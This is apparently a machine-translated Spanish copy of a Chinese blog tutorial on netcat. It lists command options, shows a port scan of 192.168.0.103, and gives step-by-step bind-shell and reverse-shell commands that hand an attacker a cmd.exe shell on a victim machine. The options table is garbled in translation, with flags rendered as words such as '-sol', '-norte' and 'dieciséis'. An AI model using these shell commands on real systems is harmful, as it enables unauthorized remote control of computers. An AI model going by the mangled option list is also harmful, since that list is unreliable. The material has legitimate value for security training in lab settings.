Uso básico de NC

NC es la abreviatura de netcat . Se conoce como la 'navaja suiza' en el campo de la seguridad de la red para leer y escribir datos a través de una conexión de red utilizando el protocolo TCP o UDP. Está diseñado como una herramienta de puerta trasera estable que puede ser manejada fácilmente directamente por otros programas y scripts. Al mismo tiempo, también es una poderosa herramienta de depuración y detección de redes que puede establecer casi todos los tipos de conexiones de red necesarias

nc [-options] hostname port [s] [ports] ...

Número de serie Código Efecto
01 -re Correr en segundo plano
02 -el prog Redirección del programa, una vez conectado, ejecute el programa enlazado (más peligroso)
03 -sol Punto de salto de enrutamiento de origen, no más de ocho veces
04 -SOL Indicadores de enrutamiento de origen 4, 8, 12, ...
05 -h Información de ayuda
06 -i segundos Ajuste del tiempo de retraso, utilizado durante el escaneo de puertos
07 -l Modo de monitoreo, esperando la conexión. Una vez completada la conexión, finaliza la supervisión.
08 -L Modo de monitoreo, esperando la conexión. Una vez completada la conexión, continúe monitoreando
09 -norte Dirección IP en forma digital
10 -o archivo Especifique el código hexadecimal a transmitir
11 -P puerto Especifique el número de puerto local.
12 -r Especifique aleatoriamente 0 local o número de puerto remoto
13 -s addr Dirección de origen local
14 -t Responde solicitudes entrantes como telnet
15 -u Método UDP
dieciséis -v Mostrar detalles
17 -w Especificar tiempo de espera
18 años -con Modo de E / S, utilizado durante el escaneo

Tales como:
1. Aplicar http / 1.1 aplicar el método GET

  • Copie el comando nc en la raíz de la unidad c
  • Ingrese al modo dos y retírese a la raíz
  • Escriba nc -l -p 80: supervise la entrada del puerto 80
  • Ingrese la dirección IP de esta máquina o 127.0.0.1 para usar el puerto 80

2. Conéctese al puerto 80

  • Ingrese dos y retírese para seguir
  • Escriba nc -l -p 80: supervise la entrada del puerto 80
  • Luego, abra un dos telnet IP local 80 o 127.0.0.1 80 para ver el enlace

3. Analice
el estado abierto de todos los puertos 80 a 445 del host remoto 192.168.0.103

Formato: nc -nvv -w2 -z 192.168.0.103 80-445
4. Conexión directa: máquina atacante 192.168.0.100, máquina atacada 192.168.0.103
Tarea: Conecte la máquina atacante 192.168.0.100 a la máquina atacada 192.168.0.103 a través del puerto 80 y opere la unidad C de la máquina atacada en tiempo real.
Paso 1 Vincula el shell al puerto 80 en la máquina atacada 192.168.0.103.
Formato: nc -vv –l –p 80 –e cmd.exe
Paso 2 El atacante 192.168.0.100 se conecta al host 192.168.0.103 a través del puerto 80 y obtiene el shell del host remoto.
Formato: nc 192.168.0.103 80
entrenamiento 5 Conexión inversa: máquina atacante 192.168.0.100, máquina atacada 192.168.0.103
Tarea: conexión inversa desde la máquina atacante 192.168.0.100 a la máquina atacada 192.168.0.103 a través del puerto 8080 Y operación en tiempo real de la unidad C de la máquina atacada.
Paso 1 El atacante 192.168.0.100 supervisa su puerto 8080.
Formato: nc -vv –l –p 8080
Paso 2 La máquina atacada 192.168.0.103 une el shell al puerto 8080 del atacante, de modo que el atacante obtiene inversamente el shell de la máquina atacada.
Formato: nc –e cmd.exe 192.168.0.100 8080

发布了15 篇原创文章 · 获赞 0 · 访问量 144

Supongo que te gusta

Origin blog.csdn.net/qq_44230959/article/details/105407718
Recomendado
Clasificación